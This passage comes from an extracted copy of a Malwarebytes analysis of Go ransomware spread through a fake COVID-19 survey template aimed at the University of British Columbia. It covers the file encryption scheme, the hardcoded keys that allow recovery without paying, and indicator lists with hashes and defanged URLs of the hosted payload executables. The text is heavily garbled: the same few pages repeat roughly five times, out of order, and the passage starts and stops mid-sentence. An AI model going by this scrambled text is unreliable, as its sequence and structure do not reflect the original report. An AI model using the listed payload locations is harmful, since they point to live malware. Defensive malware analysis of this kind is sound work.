function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2928 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2929 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2930 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2931 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2932 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2933 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2934 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2935 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2936 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2937 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2938 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2939 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2940 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2941 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2942 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2943 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2944 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2945 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2946 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2947 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2948 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2949 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2950 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2951 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2952 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2953 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2954 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2955 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2956 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2957 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2958 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2959 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM 